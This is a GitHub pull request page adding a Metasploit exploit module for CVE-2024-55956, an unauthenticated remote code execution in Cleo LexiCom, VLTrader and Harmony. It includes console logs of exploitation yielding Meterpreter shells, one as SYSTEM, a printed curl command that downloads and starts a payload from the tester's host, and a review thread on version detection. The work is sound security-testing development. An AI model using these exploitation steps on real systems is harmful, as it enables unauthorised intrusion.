
Cleo LexiCom, VLTrader, and Harmony Unauthenticated Remote Code Execution (CVE-2024-55956) #19793

Merged
merged 8 commits into from
Jan 15, 2025

Conversation

sfewer-r7
Contributor

This pull request adds an exploit module for CVE-2024-55956, an unauth file write vulnerability affecting Cleo LexiCom, VLTrader, and Harmony versions 5.8.0.23 and below.

For a full technical analysis please read our AttackerKB Rapid7 Analysis.

The module supports both native Java payloads (i.e. Java Meterpreter), as well as command payloads for both Windows and Linux targets (so Fetch based native Meterpreter et al.).

Example

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set RHOSTS 192.168.86.50
RHOSTS => 192.168.86.50
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set LHOST eth0
LHOST => 192.168.86.42
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set target 0
target => 1
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > show options 

Module options (exploit/multi/http/cleo_rce_cve_2024_55956):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    5080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > check
[*] 192.168.86.50:5080 - The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2022)
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > exploit 
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2022)
[*] Sending stage (58073 bytes) to 192.168.86.50
[+] Deleted temp/iidqizro
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:59172) at 2024-12-17 13:40:58 +0000
[!] This exploit may require manual cleanup of 'temp/kagdkplw' on the target

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 10.0 (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/windows
meterpreter > pwd
C:\LexiCom
meterpreter >


# We expect the server to respond with an HTTP Server header like "Cleo LexiCom/5.8.0.0 (Windows Server 2022)".
# Note, the target product may be either LexiCom, VLTrader, or Harmony.
if res.headers.key?('Server') && (res.headers['Server'] =~ %r{cleo\s+(\blexicom\b|\bvltrader\b|\bharmony\b)/(\d+\.\d+\.\d+\.\d+)}i)
Contributor

Are the \b really needed? Also, (?:…) can be used to have a non-matching group.

Contributor Author

Good call on both of these! I added commit 4d42c78 to resolve this. Thank you @jvoisin :)
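The review thread above turns on whether the `\b` anchors in the Server-header regex add anything. The following is an added example, not code from the module or the PR: it runs the original pattern and a simplified one (no `\b`, non-capturing group not needed since the product name is still wanted) over constructed Server header values, shows they match identically, and classifies the parsed version against the 5.8.0.23 cutoff given in the PR description, the kind of inventory check a defender would run against their own hosts. The header strings, the `Gem::Version` comparison and the `classify` helper are assumptions of this example; only the regex on the first line and the version threshold come from the page.

```ruby
require 'rubygems' # Gem::Version is already loaded by default; kept explicit

# Regex as it appeared in the review thread (with the \b anchors).
SERVER_RE_WITH_B = %r{cleo\s+(\blexicom\b|\bvltrader\b|\bharmony\b)/(\d+\.\d+\.\d+\.\d+)}i

# Simplified form: \s+ before the product name and the literal "/" after it
# already bound the word, so the \b anchors cannot change which inputs match.
# (Assumption of this example; not the committed fix.)
SERVER_RE = %r{cleo\s+(lexicom|vltrader|harmony)/(\d+\.\d+\.\d+\.\d+)}i

# Per the PR description, 5.8.0.23 and below are affected.
LAST_VULNERABLE = Gem::Version.new('5.8.0.23')

# Parse a Server header into [product, Gem::Version], or nil if not Cleo.
def parse_cleo_server(header)
  return nil if header.nil?
  m = SERVER_RE.match(header)
  return nil unless m
  [m[1].downcase, Gem::Version.new(m[2])]
end

# Classify a Server header as :vulnerable, :patched or :unknown.
def classify(header)
  parsed = parse_cleo_server(header)
  return :unknown unless parsed
  _product, version = parsed
  version <= LAST_VULNERABLE ? :vulnerable : :patched
end

# Constructed sample headers (not captured from any real host).
SAMPLE_HEADERS = [
  'Cleo LexiCom/5.8.0.0 (Windows Server 2022)',
  'Cleo VLTrader/5.8.0.23 (Linux)',
  'Cleo Harmony/5.8.0.24 (Linux)',
  'Cleo  harmony/5.7.0.1',        # extra whitespace, lowercase product
  'CleoLexiCom/5.8.0.0',          # no whitespace: neither regex matches
  'Cleo LexiComX/5.8.0.0',        # product not terminated by "/": no match
  'Apache/2.4.57 (Ubuntu)',
  nil
].freeze

# True when both regexes agree (match/no match and captures) on every header.
def regexes_agree?(headers = SAMPLE_HEADERS)
  headers.compact.all? do |h|
    a = SERVER_RE_WITH_B.match(h)
    b = SERVER_RE.match(h)
    (a.nil? && b.nil?) || (a && b && a[1] == b[1] && a[2] == b[2])
  end
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_HEADERS.each { |h| puts "#{h.inspect} => #{classify(h)}" }
  puts "regexes agree on all samples: #{regexes_agree?}"
end
```

Running the file prints one classification per sample header and confirms the two patterns agree, which is the concrete answer to the reviewer's question: the `\b` anchors are redundant here because the surrounding `\s+` and `/` already delimit the product name.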

Three further review threads on modules/exploits/multi/http/cleo_rce_cve_2024_55956.rb (outdated, resolved)
@bwatters-r7 bwatters-r7 self-assigned this Jan 15, 2025
@bwatters-r7
Contributor

Win 2019x64

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set rhost 10.5.132.130
rhost => 10.5.132.130
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set target 0
target => 0
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > show options

Module options (exploit/multi/http/cleo_rce_cve_2024_55956):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.130     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    5080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set verbose true
verbose => true
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2019)
[*] Sending stage (58073 bytes) to 10.5.132.130
[+] Deleted temp/wzggssyz
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.130:49785) at 2025-01-15 15:00:04 -0600
[!] This exploit may require manual cleanup of 'temp/fnzddovc' on the target

meterpreter > sysinfo
Computer        : Win2019__4cb9
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
meterpreter > getuid
Server username: WIN2019__4CB9$
meterpreter >

@bwatters-r7
Contributor

Command injection

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > run
[*] Command to run on remote host: curl -so %TEMP%\qUPlZdbNyIMY.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\qUPlZdbNyIMY.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2019)
[*] Client 10.5.132.130 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.132.130 (curl/7.55.1)
[+] Deleted temp/bfnvqqta
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.130:49793) at 2025-01-15 15:03:06 -0600

meterpreter > sysinfo
Computer        : WIN2019__4CB9
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@bwatters-r7 bwatters-r7 merged commit 9bd8590 into rapid7:master Jan 15, 2025
37 checks passed
@bwatters-r7
Contributor

bwatters-r7 commented Jan 15, 2025

Release Notes

Add an exploit module for CVE-2024-55956, an unauthenticated file write vulnerability affecting Cleo LexiCom, VLTrader, and Harmony versions 5.8.0.23 and below.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 16, 2025

3 participants